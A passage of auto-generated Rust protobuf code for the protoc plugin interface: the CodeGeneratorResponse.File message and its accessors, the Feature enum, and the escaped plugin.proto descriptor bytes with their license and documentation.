name: ::std::option::Option<::std::string::String>,
/// If non-empty, indicates that the named file should already exist, and the
/// content here is to be inserted into that file at a defined insertion
/// point. This feature allows a code generator to extend the output
/// produced by another code generator. The original generator may provide
/// insertion points by placing special annotations in the file that look
/// like:
/// @@protoc_insertion_point(NAME)
/// The annotation can have arbitrary text before and after it on the line,
/// which allows it to be placed in a comment. NAME should be replaced with
/// an identifier naming the point -- this is what other generators will use
/// as the insertion_point. Code inserted at this point will be placed
/// immediately above the line containing the insertion point (thus multiple
/// insertions to the same point will come out in the order they were added).
/// The double-@ is intended to make it unlikely that the generated code
/// could contain things that look like insertion points by accident.
///
/// For example, the C++ code generator places the following line in the
/// .pb.h files that it generates:
/// // @@protoc_insertion_point(namespace_scope)
/// This line appears within the scope of the file's package namespace, but
/// outside of any particular class. Another plugin can then specify the
/// insertion_point "namespace_scope" to generate additional classes or
/// other declarations that should be placed in this scope.
///
/// Note that if the line containing the insertion point begins with
/// whitespace, the same whitespace will be added to every line of the
/// inserted text. This is useful for languages like Python, where
/// indentation matters. In these languages, the insertion point comment
/// should be indented the same amount as any inserted code will need to be
/// in order to work correctly in that context.
///
/// The code generator that generates the initial file and the one which
/// inserts into it must both run as part of a single invocation of protoc.
/// Code generators are executed in the order in which they appear on the
/// command line.
///
/// If |insertion_point| is present, |name| must also be present.
insertion_point: ::std::option::Option<::std::string::String>,
/// The file contents.
content: ::std::option::Option<::std::string::String>,
/// Information describing the file content being inserted. If an insertion
/// point is used, this information will be appropriately offset and inserted
/// into the code generation metadata for the generated files.
pub generated_code_info: crate::MessageField<crate::descriptor::GeneratedCodeInfo>,
// special fields
#[cfg_attr(serde, serde(skip))]
pub unknown_fields: crate::UnknownFields,
#[cfg_attr(serde, serde(skip))]
pub cached_size: crate::rt::CachedSize,
}
impl<'a> ::std::default::Default for &'a File {
fn default() -> &'a File {
<File as crate::Message>::default_instance()
}
}
impl File {
pub fn new() -> File {
::std::default::Default::default()
}
// optional string name = 1;
pub fn get_name(&self) -> &str {
match self.name.as_ref() {
Some(v) => v,
None => "",
}
}
pub fn clear_name(&mut self) {
self.name = ::std::option::Option::None;
}
pub fn has_name(&self) -> bool {
self.name.is_some()
}
// Param is passed by value, moved
pub fn set_name(&mut self, v: ::std::string::String) {
self.name = ::std::option::Option::Some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_name(&mut self) -> &mut ::std::string::String {
if self.name.is_none() {
self.name = ::std::option::Option::Some(::std::string::String::new());
}
self.name.as_mut().unwrap()
}
// Take field
pub fn take_name(&mut self) -> ::std::string::String {
self.name.take().unwrap_or_else(|| ::std::string::String::new())
}
// optional string insertion_point = 2;
pub fn get_insertion_point(&self) -> &str {
match self.insertion_point.as_ref() {
Some(v) => v,
None => "",
}
}
pub fn clear_insertion_point(&mut self) {
self.insertion_point = ::std::option::Option::None;
}
pub fn has_insertion_point(&self) -> bool {
self.insertion_point.is_some()
}
// Param is passed by value, moved
pub fn set_insertion_point(&mut self, v: ::std::string::String) {
self.insertion_point = ::std::option::Option::Some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_insertion_point(&mut self) -> &mut ::std::string::String {
if self.insertion_point.is_none() {
self.insertion_point = ::std::option::Option::Some(::std::string::String::new());
}
self.insertion_point.as_mut().unwrap()
}
// Take field
pub fn take_insertion_point(&mut self) -> ::std::string::String {
self.insertion_point.take().unwrap_or_else(|| ::std::string::String::new())
}
// optional string content = 15;
pub fn get_content(&self) -> &str {
match self.content.as_ref() {
Some(v) => v,
None => "",
}
}
pub fn clear_content(&mut self) {
self.content = ::std::option::Option::None;
}
pub fn has_content(&self) -> bool {
self.content.is_some()
}
// Param is passed by value, moved
pub fn set_content(&mut self, v: ::std::string::String) {
self.content = ::std::option::Option::Some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_content(&mut self) -> &mut ::std::string::String {
if self.content.is_none() {
self.content = ::std::option::Option::Some(::std::string::String::new());
}
self.content.as_mut().unwrap()
}
// Take field
pub fn take_content(&mut self) -> ::std::string::String {
self.content.take().unwrap_or_else(|| ::std::string::String::new())
}
pub(in super) fn generated_message_descriptor_data() -> crate::reflect::GeneratedMessageDescriptorData {
let mut fields = ::std::vec::Vec::new();
fields.push(crate::reflect::rt::v2::make_option_get_ref_simpler_accessor::<_, _>(
"name",
|m: &File| { &m.name },
|m: &mut File| { &mut m.name },
File::get_name,
));
fields.push(crate::reflect::rt::v2::make_option_get_ref_simpler_accessor::<_, _>(
"insertion_point",
|m: &File| { &m.insertion_point },
|m: &mut File| { &mut m.insertion_point },
File::get_insertion_point,
));
fields.push(crate::reflect::rt::v2::make_option_get_ref_simpler_accessor::<_, _>(
"content",
|m: &File| { &m.content },
|m: &mut File| { &mut m.content },
File::get_content,
));
fields.push(crate::reflect::rt::v2::make_message_field_accessor::<_, crate::descriptor::GeneratedCodeInfo>(
"generated_code_info",
|m: &File| { &m.generated_code_info },
|m: &mut File| { &mut m.generated_code_info },
));
crate::reflect::GeneratedMessageDescriptorData::new_2::<File>(
"CodeGeneratorResponse.File",
3,
fields,
)
}
}
impl crate::Message for File {
fn is_initialized(&self) -> bool {
for v in &self.generated_code_info {
if !v.is_initialized() {
return false;
}
};
true
}
fn merge_from(&mut self, is: &mut crate::CodedInputStream<'_>) -> crate::ProtobufResult<()> {
while !is.eof()? {
let (field_number, wire_type) = is.read_tag_unpack()?;
match field_number {
1 => {
if wire_type != crate::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(crate::rt::unexpected_wire_type(wire_type));
}
self.name = ::std::option::Option::Some(is.read_string()?);
},
2 => {
if wire_type != crate::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(crate::rt::unexpected_wire_type(wire_type));
}
self.insertion_point = ::std::option::Option::Some(is.read_string()?);
},
15 => {
if wire_type != crate::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(crate::rt::unexpected_wire_type(wire_type));
}
self.content = ::std::option::Option::Some(is.read_string()?);
},
16 => {
crate::rt::read_singular_message_into_field(wire_type, is, &mut self.generated_code_info)?;
},
_ => {
crate::rt::read_unknown_or_skip_group(field_number, wire_type, is, self.mut_unknown_fields())?;
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
if let Some(v) = self.name.as_ref() {
my_size += crate::rt::string_size(1, &v);
}
if let Some(v) = self.insertion_point.as_ref() {
my_size += crate::rt::string_size(2, &v);
}
if let Some(v) = self.content.as_ref() {
my_size += crate::rt::string_size(15, &v);
}
if let Some(v) = self.generated_code_info.as_ref() {
let len = v.compute_size();
my_size += 2 + crate::rt::compute_raw_varint32_size(len) + len;
}
my_size += crate::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);
my_size
}
fn write_to_with_cached_sizes(&self, os: &mut crate::CodedOutputStream<'_>) -> crate::ProtobufResult<()> {
if let Some(v) = self.name.as_ref() {
os.write_string(1, v)?;
}
if let Some(v) = self.insertion_point.as_ref() {
os.write_string(2, v)?;
}
if let Some(v) = self.content.as_ref() {
os.write_string(15, v)?;
}
if let Some(v) = self.generated_code_info.as_ref() {
crate::rt::write_message_field_with_cached_size(16, v, os)?;
}
os.write_unknown_fields(self.get_unknown_fields())?;
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields(&self) -> &crate::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields(&mut self) -> &mut crate::UnknownFields {
&mut self.unknown_fields
}
fn new() -> File {
File::new()
}
fn descriptor_static() -> crate::reflect::MessageDescriptor {
crate::reflect::MessageDescriptor::new_generated_2(super::file_descriptor(), 3)
}
fn default_instance() -> &'static File {
static instance: File = File {
name: ::std::option::Option::None,
insertion_point: ::std::option::Option::None,
content: ::std::option::Option::None,
generated_code_info: crate::MessageField::none(),
unknown_fields: crate::UnknownFields::new(),
cached_size: crate::rt::CachedSize::new(),
};
&instance
}
}
impl crate::Clear for File {
fn clear(&mut self) {
self.name = ::std::option::Option::None;
self.insertion_point = ::std::option::Option::None;
self.content = ::std::option::Option::None;
self.generated_code_info.clear();
self.unknown_fields.clear();
}
}
impl ::std::fmt::Debug for File {
fn fmt(&self, f: &mut ::std::fmt::Formatter<'_>) -> ::std::fmt::Result {
crate::text_format::fmt(self, f)
}
}
impl crate::reflect::ProtobufValue for File {
type RuntimeType = crate::reflect::runtime_types::RuntimeTypeMessage<Self>;
}
/// Sync with code_generator.h.
#[derive(Clone,Copy,PartialEq,Eq,Debug,Hash)]
#[cfg_attr(serde, derive(::serde::Serialize, ::serde::Deserialize))]
pub enum Feature {
FEATURE_NONE = 0,
FEATURE_PROTO3_OPTIONAL = 1,
}
impl crate::ProtobufEnum for Feature {
fn value(&self) -> i32 {
*self as i32
}
fn from_i32(value: i32) -> ::std::option::Option<Feature> {
match value {
0 => ::std::option::Option::Some(Feature::FEATURE_NONE),
1 => ::std::option::Option::Some(Feature::FEATURE_PROTO3_OPTIONAL),
_ => ::std::option::Option::None
}
}
fn values() -> &'static [Self] {
static values: &'static [Feature] = &[
Feature::FEATURE_NONE,
Feature::FEATURE_PROTO3_OPTIONAL,
];
values
}
fn enum_descriptor_static() -> crate::reflect::EnumDescriptor {
crate::reflect::EnumDescriptor::new_generated_2(super::file_descriptor(), 0)
}
}
impl ::std::default::Default for Feature {
fn default() -> Self {
Feature::FEATURE_NONE
}
}
impl crate::reflect::ProtobufValue for Feature {
type RuntimeType = crate::reflect::runtime_types::RuntimeTypeEnum<Self>;
}
impl Feature {
pub(in super) fn generated_enum_descriptor_data() -> crate::reflect::GeneratedEnumDescriptorData {
crate::reflect::GeneratedEnumDescriptorData::new_2::<Feature>("CodeGeneratorResponse.Feature", 0)
}
}
}
static file_descriptor_proto_data: &'static [u8] = b"\
\n%google/protobuf/compiler/plugin.proto\x12\x18google.protobuf.compiler\
\x1a\x20google/protobuf/descriptor.proto\"c\n\x07Version\x12\x14\n\x05ma\
jor\x18\x01\x20\x01(\x05R\x05major\x12\x14\n\x05minor\x18\x02\x20\x01(\
\x05R\x05minor\x12\x14\n\x05patch\x18\x03\x20\x01(\x05R\x05patch\x12\x16\
\n\x06suffix\x18\x04\x20\x01(\tR\x06suffix\"\xf1\x01\n\x14CodeGeneratorR\
equest\x12(\n\x10file_to_generate\x18\x01\x20\x03(\tR\x0efileToGenerate\
\x12\x1c\n\tparameter\x18\x02\x20\x01(\tR\tparameter\x12C\n\nproto_file\
\x18\x0f\x20\x03(\x0b2$.google.protobuf.FileDescriptorProtoR\tprotoFile\
\x12L\n\x10compiler_version\x18\x03\x20\x01(\x0b2!.google.protobuf.compi\
ler.VersionR\x0fcompilerVersion\"\x94\x03\n\x15CodeGeneratorResponse\x12\
\x14\n\x05error\x18\x01\x20\x01(\tR\x05error\x12-\n\x12supported_feature\
s\x18\x02\x20\x01(\x04R\x11supportedFeatures\x12H\n\x04file\x18\x0f\x20\
\x03(\x0b24.google.protobuf.compiler.CodeGeneratorResponse.FileR\x04file\
\x1a\xb1\x01\n\x04File\x12\x12\n\x04name\x18\x01\x20\x01(\tR\x04name\x12\
'\n\x0finsertion_point\x18\x02\x20\x01(\tR\x0einsertionPoint\x12\x18\n\
\x07content\x18\x0f\x20\x01(\tR\x07content\x12R\n\x13generated_code_info\
\x18\x10\x20\x01(\x0b2\".google.protobuf.GeneratedCodeInfoR\x11generated\
CodeInfo\"8\n\x07Feature\x12\x10\n\x0cFEATURE_NONE\x10\0\x12\x1b\n\x17FE\
ATURE_PROTO3_OPTIONAL\x10\x01BW\n\x1ccom.google.protobuf.compilerB\x0cPl\
uginProtosZ)google.golang.org/protobuf/types/pluginpbJ\xf9C\n\x07\x12\
\x05.\0\xb6\x01\x01\n\xca\x11\n\x01\x0c\x12\x03.\0\x122\xc1\x0c\x20Proto\
col\x20Buffers\x20-\x20Google's\x20data\x20interchange\x20format\n\x20Co\
pyright\x202008\x20Google\x20Inc.\x20\x20All\x20rights\x20reserved.\n\
\x20https://developers.google.com/protocol-buffers/\n\n\x20Redistributio\
n\x20and\x20use\x20in\x20source\x20and\x20binary\x20forms,\x20with\x20or\
\x20without\n\x20modification,\x20are\x20permitted\x20provided\x20that\
\x20the\x20following\x20conditions\x20are\n\x20met:\n\n\x20\x20\x20\x20\
\x20*\x20Redistributions\x20of\x20source\x20code\x20must\x20retain\x20th\
e\x20above\x20copyright\n\x20notice,\x20this\x20list\x20of\x20conditions\
\x20and\x20the\x20following\x20disclaimer.\n\x20\x20\x20\x20\x20*\x20Red\
istributions\x20in\x20binary\x20form\x20must\x20reproduce\x20the\x20abov\
e\n\x20copyright\x20notice,\x20this\x20list\x20of\x20conditions\x20and\
\x20the\x20following\x20disclaimer\n\x20in\x20the\x20documentation\x20an\
d/or\x20other\x20materials\x20provided\x20with\x20the\n\x20distribution.\
\n\x20\x20\x20\x20\x20*\x20Neither\x20the\x20name\x20of\x20Google\x20Inc\
.\x20nor\x20the\x20names\x20of\x20its\n\x20contributors\x20may\x20be\x20\
used\x20to\x20endorse\x20or\x20promote\x20products\x20derived\x20from\n\
\x20this\x20software\x20without\x20specific\x20prior\x20written\x20permi\
ssion.\n\n\x20THIS\x20SOFTWARE\x20IS\x20PROVIDED\x20BY\x20THE\x20COPYRIG\
HT\x20HOLDERS\x20AND\x20CONTRIBUTORS\n\x20\"AS\x20IS\"\x20AND\x20ANY\x20\
EXPRESS\x20OR\x20IMPLIED\x20WARRANTIES,\x20INCLUDING,\x20BUT\x20NOT\n\
\x20LIMITED\x20TO,\x20THE\x20IMPLIED\x20WARRANTIES\x20OF\x20MERCHANTABIL\
ITY\x20AND\x20FITNESS\x20FOR\n\x20A\x20PARTICULAR\x20PURPOSE\x20ARE\x20D\
ISCLAIMED.\x20IN\x20NO\x20EVENT\x20SHALL\x20THE\x20COPYRIGHT\n\x20OWNER\
\x20OR\x20CONTRIBUTORS\x20BE\x20LIABLE\x20FOR\x20ANY\x20DIRECT,\x20INDIR\
ECT,\x20INCIDENTAL,\n\x20SPECIAL,\x20EXEMPLARY,\x20OR\x20CONSEQUENTIAL\
\x20DAMAGES\x20(INCLUDING,\x20BUT\x20NOT\n\x20LIMITED\x20TO,\x20PROCUREM\
ENT\x20OF\x20SUBSTITUTE\x20GOODS\x20OR\x20SERVICES;\x20LOSS\x20OF\x20USE\
,\n\x20DATA,\x20OR\x20PROFITS;\x20OR\x20BUSINESS\x20INTERRUPTION)\x20HOW\
EVER\x20CAUSED\x20AND\x20ON\x20ANY\n\x20THEORY\x20OF\x20LIABILITY,\x20WH\
ETHER\x20IN\x20CONTRACT,\x20STRICT\x20LIABILITY,\x20OR\x20TORT\n\x20(INC\
LUDING\x20NEGLIGENCE\x20OR\x20OTHERWISE)\x20ARISING\x20IN\x20ANY\x20WAY\
\x20OUT\x20OF\x20THE\x20USE\n\x20OF\x20THIS\x20SOFTWARE,\x20EVEN\x20IF\
\x20ADVISED\x20OF\x20THE\x20POSSIBILITY\x20OF\x20SUCH\x20DAMAGE.\n2\xfb\
\x04\x20Author:\[email protected]\x20(Kenton\x20Varda)\n\n\x20WARNING\
:\x20\x20The\x20plugin\x20interface\x20is\x20currently\x20EXPERIMENTAL\
\x20and\x20is\x20subject\x20to\n\x20\x20\x20change.\n\n\x20protoc\x20(ak\
a\x20the\x20Protocol\x20Compiler)\x20can\x20be\x20extended\x20via\x20plu\
gins.\x20\x20A\x20plugin\x20is\n\x20just\x20a\x20program\x20that\x20read\
s\x20a\x20CodeGeneratorRequest\x20from\x20stdin\x20and\x20writes\x20a\n\
\x20CodeGeneratorResponse\x20to\x20stdout.\n\n\x20Plugins\x20written\x20\
using\x20C++\x20can\x20use\x20google/protobuf/compiler/plugin.h\x20inste\
ad\n\x20of\x20dealing\x20with\x20the\x20raw\x20protocol\x20defined\x20he\
re.\n\n\x20A\x20plugin\x20executable\x20needs\x20only\x20to\x20be\x20pla\
ced\x20somewhere\x20in\x20the\x20path.\x20\x20The\n\x20plugin\x20should\
\x20be\x20named\x20\"protoc-gen-$NAME\",\x20and\x20will\x20then\x20be\
\x20used\x20when\x20the\n\x20flag\x20\"--${NAME}_out\"\x20is\x20passed\
\x20to\x20protoc.\n\n\x08\n\x01\x02\x12\x030\0!\n\x08\n\x01\x08\x12\x031\
\05\n\t\n\x02\x08\x01\x12\x031\05\n\x08\n\x01\x08\x12\x032\0-\n\t\n\x02\
\x08\x08\x12\x032\0-\n\x08\n\x01\x08\x12\x034\0@\n\t\n\x02\x08\x0b\x12\
\x034\0@\n\t\n\x02\x03\0\x12\x036\0*\n6\n\x02\x04\0\x12\x049\0@\x01\x1a*\
\x20The\x20version\x20number\x20of\x20protocol\x20compiler.\n\n\n\n\x03\
\x04\0\x01\x12\x039\x08\x0f\n\x0b\n\x04\x04\0\x02\0\x12\x03:\x02\x1b\n\
\x0c\n\x05\x04\0\x02\0\x04\x12\x03:\x02\n\n\x0c\n\x05\x04\0\x02\0\x05\
\x12\x03:\x0b\x10\n\x0c\n\x05\x04\0\x02\0\x01\x12\x03:\x11\x16\n\x0c\n\
\x05\x04\0\x02\0\x03\x12\x03:\x19\x1a\n\x0b\n\x04\x04\0\x02\x01\x12\x03;\
\x02\x1b\n\x0c\n\x05\x04\0\x02\x01\x04\x12\x03;\x02\n\n\x0c\n\x05\x04\0\
\x02\x01\x05\x12\x03;\x0b\x10\n\x0c\n\x05\x04\0\x02\x01\x01\x12\x03;\x11\
\x16\n\x0c\n\x05\x04\0\x02\x01\x03\x12\x03;\x19\x1a\n\x0b\n\x04\x04\0\
\x02\x02\x12\x03<\x02\x1b\n\x0c\n\x05\x04\0\x02\x02\x04\x12\x03<\x02\n\n\
\x0c\n\x05\x04\0\x02\x02\x05\x12\x03<\x0b\x10\n\x0c\n\x05\x04\0\x02\x02\
\x01\x12\x03<\x11\x16\n\x0c\n\x05\x04\0\x02\x02\x03\x12\x03<\x19\x1a\n\
\x80\x01\n\x04\x04\0\x02\x03\x12\x03?\x02\x1d\x1as\x20A\x20suffix\x20for\
\x20alpha,\x20beta\x20or\x20rc\x20release,\x20e.g.,\x20\"alpha-1\",\x20\
\"rc2\".\x20It\x20should\n\x20be\x20empty\x20for\x20mainline\x20stable\
\x20releases.\n\n\x0c\n\x05\x04\0\x02\x03\x04\x12\x03?\x02\n\n\x0c\n\x05\
\x04\0\x02\x03\x05\x12\x03?\x0b\x11\n\x0c\n\x05\x04\0\x02\x03\x01\x12\
\x03?\x12\x18\n\x0c\n\x05\x04\0\x02\x03\x03\x12\x03?\x1b\x1c\nO\n\x02\
\x04\x01\x12\x04C\0_\x01\x1aC\x20An\x20encoded\x20CodeGeneratorRequest\
\x20is\x20written\x20to\x20the\x20plugin's\x20stdin.\n\n\n\n\x03\x04\x01\
\x01\x12\x03C\x08\x1c\n\xd1\x01\n\x04\x04\x01\x02\0\x12\x03G\x02'\x1a\
\xc3\x01\x20The\x20.proto\x20files\x20that\x20were\x20explicitly\x20list\
ed\x20on\x20the\x20command-line.\x20\x20The\n\x20code\x20generator\x20sh\
ould\x20generate\x20code\x20only\x20for\x20these\x20files.\x20\x20Each\
\x20file's\n\x20descriptor\x20will\x20be\x20included\x20in\x20proto_file\
,\x20below.\n\n\x0c\n\x05\x04\x01\x02\0\x04\x12\x03G\x02\n\n\x0c\n\x05\
\x04\x01\x02\0\x05\x12\x03G\x0b\x11\n\x0c\n\x05\x04\x01\x02\0\x01\x12\
\x03G\x12\"\n\x0c\n\x05\x04\x01\x02\0\x03\x12\x03G%&\nB\n\x04\x04\x01\
\x02\x01\x12\x03J\x02\x20\x1a5\x20The\x20generator\x20parameter\x20passe\
d\x20on\x20the\x20command-line.\n\n\x0c\n\x05\x04\x01\x02\x01\x04\x12\
\x03J\x02\n\n\x0c\n\x05\x04\x01\x02\x01\x05\x12\x03J\x0b\x11\n\x0c\n\x05\
\x04\x01\x02\x01\x01\x12\x03J\x12\x1b\n\x0c\n\x05\x04\x01\x02\x01\x03\
\x12\x03J\x1e\x1f\n\x87\x06\n\x04\x04\x01\x02\x02\x12\x03Z\x02/\x1a\xf9\
\x05\x20FileDescriptorProtos\x20for\x20all\x20files\x20in\x20files_to_ge\
nerate\x20and\x20everything\n\x20they\x20import.\x20\x20The\x20files\x20\
will\x20appear\x20in\x20topological\x20order,\x20so\x20each\x20file\n\
\x20appears\x20before\x20any\x20file\x20that\x20imports\x20it.\n\n\x20pr\
otoc\x20guarantees\x20that\x20all\x20proto_files\x20will\x20be\x20writte\
n\x20after\n\x20the\x20fields\x20above,\x20even\x20though\x20this\x20is\
\x20not\x20technically\x20guaranteed\x20by\x20the\n\x20protobuf\x20wire\
\x20format.\x20\x20This\x20theoretically\x20could\x20allow\x20a\x20plugi\
n\x20to\x20stream\n\x20in\x20the\x20FileDescriptorProtos\x20and\x20handl\
e\x20them\x20one\x20by\x20one\x20rather\x20than\x20read\n\x20the\x20enti\
re\x20set\x20into\x20memory\x20at\x20once.\x20\x20However,\x20as\x20of\
\x20this\x20writing,\x20this\n\x20is\x20not\x20similarly\x20optimized\
\x20on\x20protoc's\x20end\x20--\x20it\x20will\x20store\x20all\x20fields\
\x20in\n\x20memory\x20at\x20once\x20before\x20sending\x20them\x20to\x20t\
he\x20plugin.\n\n\x20Type\x20names\x20of\x20fields\x20and\x20extensions\
\x20in\x20the\x20FileDescriptorProto\x20are\x20always\n\x20fully\x20qual\
ified.\n\n\x0c\n\x05\x04\x01\x02\x02\x04\x12\x03Z\x02\n\n\x0c\n\x05\x04\
\x01\x02\x02\x06\x12\x03Z\x0b\x1e\n\x0c\n\x05\x04\x01\x02\x02\x01\x12\
\x03Z\x1f)\n\x0c\n\x05\x04\x01\x02\x02\x03\x12\x03Z,.\n7\n\x04\x04\x01\
\x02\x03\x12\x03]\x02(\x1a*\x20The\x20version\x20number\x20of\x20protoco\
l\x20compiler.\n\n\x0c\n\x05\x04\x01\x02\x03\x04\x12\x03]\x02\n\n\x0c\n\
\x05\x04\x01\x02\x03\x06\x12\x03]\x0b\x12\n\x0c\n\x05\x04\x01\x02\x03\
\x01\x12\x03]\x13#\n\x0c\n\x05\x04\x01\x02\x03\x03\x12\x03]&'\nL\n\x02\
\x04\x02\x12\x05b\0\xb6\x01\x01\x1a?\x20The\x20plugin\x20writes\x20an\
\x20encoded\x20CodeGeneratorResponse\x20to\x20stdout.\n\n\n\n\x03\x04\
\x02\x01\x12\x03b\x08\x1d\n\xed\x03\n\x04\x04\x02\x02\0\x12\x03k\x02\x1c\
\x1a\xdf\x03\x20Error\x20message.\x20\x20If\x20non-empty,\x20code\x20gen\
eration\x20failed.\x20\x20The\x20plugin\x20process\n\x20should\x20exit\
\x20with\x20status\x20code\x20zero\x20even\x20if\x20it\x20reports\x20an\
\x20error\x20in\x20this\x20way.\n\n\x20This\x20should\x20be\x20used\x20t\
o\x20indicate\x20errors\x20in\x20.proto\x20files\x20which\x20prevent\x20\
the\n\x20code\x20generator\x20from\x20generating\x20correct\x20code.\x20\
\x20Errors\x20which\x20indicate\x20a\n\x20problem\x20in\x20protoc\x20its\
elf\x20--\x20such\x20as\x20the\x20input\x20CodeGeneratorRequest\x20being\
\n\x20unparseable\x20--\x20should\x20be\x20reported\x20by\x20writing\x20\
a\x20message\x20to\x20stderr\x20and\n\x20exiting\x20with\x20a\x20non-zer\
o\x20status\x20code.\n\n\x0c\n\x05\x04\x02\x02\0\x04\x12\x03k\x02\n\n\
\x0c\n\x05\x04\x02\x02\0\x05\x12\x03k\x0b\x11\n\x0c\n\x05\x04\x02\x02\0\
\x01\x12\x03k\x12\x17\n\x0c\n\x05\x04\x02\x02\0\x03\x12\x03k\x1a\x1b\n\
\x89\x01\n\x04\x04\x02\x02\x01\x12\x03o\x02)\x1a|\x20A\x20bitmask\x20of\
\x20supported\x20features\x20that\x20the\x20code\x20generator\x20support\
s.\n\x20This\x20is\x20a\x20bitwise\x20\"or\"\x20of\x20values\x20from\x20\
the\x20Feature\x20enum.\n\n\x0c\n\x05\x04\x02\x02\x01\x04\x12\x03o\x02\n\
\n\x0c\n\x05\x04\x02\x02\x01\x05\x12\x03o\x0b\x11\n\x0c\n\x05\x04\x02\
\x02\x01\x01\x12\x03o\x12$\n\x0c\n\x05\x04\x02\x02\x01\x03\x12\x03o'(\n+\
\n\x04\x04\x02\x04\0\x12\x04r\x02u\x03\x1a\x1d\x20Sync\x20with\x20code_g\
enerator.h.\n\n\x0c\n\x05\x04\x02\x04\0\x01\x12\x03r\x07\x0e\n\r\n\x06\
\x04\x02\x04\0\x02\0\x12\x03s\x04\x15\n\x0e\n\x07\x04\x02\x04\0\x02\0\
\x01\x12\x03s\x04\x10\n\x0e\n\x07\x04\x02\x04\0\x02\0\x02\x12\x03s\x13\
\x14\n\r\n\x06\x04\x02\x04\0\x02\x01\x12\x03t\x04\x20\n\x0e\n\x07\x04\
\x02\x04\0\x02\x01\x01\x12\x03t\x04\x1b\n\x0e\n\x07\x04\x02\x04\0\x02\
\x01\x02\x12\x03t\x1e\x1f\n4\n\x04\x04\x02\x03\0\x12\x05x\x02\xb4\x01\
\x03\x1a%\x20Represents\x20a\x20single\x20generated\x20file.\n\n\x0c\n\
\x05\x04\x02\x03\0\x01\x12\x03x\n\x0e\n\xae\x05\n\x06\x04\x02\x03\0\x02\
\0\x12\x04\x84\x01\x04\x1d\x1a\x9d\x05\x20The\x20file\x20name,\x20relati\
ve\x20to\x20the\x20output\x20directory.\x20\x20The\x20name\x20must\x20no\
t\n\x20contain\x20\".\"\x20or\x20\"..\"\x20components\x20and\x20must\x20\ | \n\n\x20If\x20the\x20name\x20is\x20omitted,\x20the\x20content\x20will\
\x20be\x20appended\x20to\x20the\x20previous\n\x20file.\x20\x20This\x20al\
lows\x20the\x20generator\x20to\x20break\x20large\x20files\x20into\x20sma\
ll\x20chunks,\n\x20and\x20allows\x20the\x20generated\x20text\x20to\x20be\
\x20streamed\x20back\x20to\x20protoc\x20so\x20that\x20large\n\x20files\
\x20need\x20not\x20reside\x20completely\x20in\x20memory\x20at\x20one\x20\
time.\x20\x20Note\x20that\x20as\x20of\n\x20this\x20writing\x20protoc\x20\
does\x20not\x20optimize\x20for\x20this\x20--\x20it\x20will\x20read\x20th\
e\x20entire\n\x20CodeGeneratorResponse\x20before\x20writing\x20files\x20\
to\x20disk.\n\n\x0f\n\x07\x04\x02\x03\0\x02\0\x04\x12\x04\x84\x01\x04\
\x0c\n\x0f\n\x07\x04\x02\x03\0\x02\0\x05\x12\x04\x84\x01\r\x13\n\x0f\n\
\x07\x04\x02\x03\0\x02\0\x01\x12\x04\x84\x01\x14\x18\n\x0f\n\x07\x04\x02\
\x03\0\x02\0\x03\x12\x04\x84\x01\x1b\x1c\n\xae\x10\n\x06\x04\x02\x03\0\
\x02\x01\x12\x04\xab\x01\x04(\x1a\x9d\x10\x20If\x20non-empty,\x20indicat\
es\x20that\x20the\x20named\x20file\x20should\x20already\x20exist,\x20and\
\x20the\n\x20content\x20here\x20is\x20to\x20be\x20inserted\x20into\x20th\
at\x20file\x20at\x20a\x20defined\x20insertion\n\x20point.\x20\x20This\
\x20feature\x20allows\x20a\x20code\x20generator\x20to\x20extend\x20the\
\x20output\n\x20produced\x20by\x20another\x20code\x20generator.\x20\x20T\
he\x20original\x20generator\x20may\x20provide\n\x20insertion\x20points\
\x20by\x20placing\x20special\x20annotations\x20in\x20the\x20file\x20that\
\x20look\n\x20like:\n\x20\x20\x20@@protoc_insertion_point(NAME)\n\x20The\
\x20annotation\x20can\x20have\x20arbitrary\x20text\x20before\x20and\x20a\
fter\x20it\x20on\x20the\x20line,\n\x20which\x20allows\x20it\x20to\x20be\
\x20placed\x20in\x20a\x20comment.\x20\x20NAME\x20should\x20be\x20replace\
d\x20with\n\x20an\x20identifier\x20naming\x20the\x20point\x20--\x20this\
\x20is\x20what\x20other\x20generators\x20will\x20use\n\x20as\x20the\x20i\
nsertion_point.\x20\x20Code\x20inserted\x20at\x20this\x20point\x20will\
\x20be\x20placed\n\x20immediately\x20above\x20the\x20line\x20containing\
\x20the\x20insertion\x20point\x20(thus\x20multiple\n\x20insertions\x20to\
\x20the\x20same\x20point\x20will\x20come\x20out\x20in\x20the\x20order\
\x20they\x20were\x20added).\n\x20The\x20double-@\x20is\x20intended\x20to\
\x20make\x20it\x20unlikely\x20that\x20the\x20generated\x20code\n\x20coul\
d\x20contain\x20things\x20that\x20look\x20like\x20insertion\x20points\
\x20by\x20accident.\n\n\x20For\x20example,\x20the\x20C++\x20code\x20gene\
rator\x20places\x20the\x20following\x20line\x20in\x20the\n\x20.pb.h\x20f\
iles\x20that\x20it\x20generates:\n\x20\x20\x20//\x20@@protoc_insertion_p\
oint(namespace_scope)\n\x20This\x20line\x20appears\x20within\x20the\x20s\
cope\x20of\x20the\x20file's\x20package\x20namespace,\x20but\n\x20outside\
\x20of\x20any\x20particular\x20class.\x20\x20Another\x20plugin\x20can\
\x20then\x20specify\x20the\n\x20insertion_point\x20\"namespace_scope\"\
\x20to\x20generate\x20additional\x20classes\x20or\n\x20other\x20declarat\
ions\x20that\x20should\x20be\x20placed\x20in\x20this\x20scope.\n\n\x20No\
te\x20that\x20if\x20the\x20line\x20containing\x20the\x20insertion\x20poi\
nt\x20begins\x20with\n\x20whitespace,\x20the\x20same\x20whitespace\x20wi\
ll\x20be\x20added\x20to\x20every\x20line\x20of\x20the\n\x20inserted\x20t\
ext.\x20\x20This\x20is\x20useful\x20for\x20languages\x20like\x20Python,\
\x20where\n\x20indentation\x20matters.\x20\x20In\x20these\x20languages,\
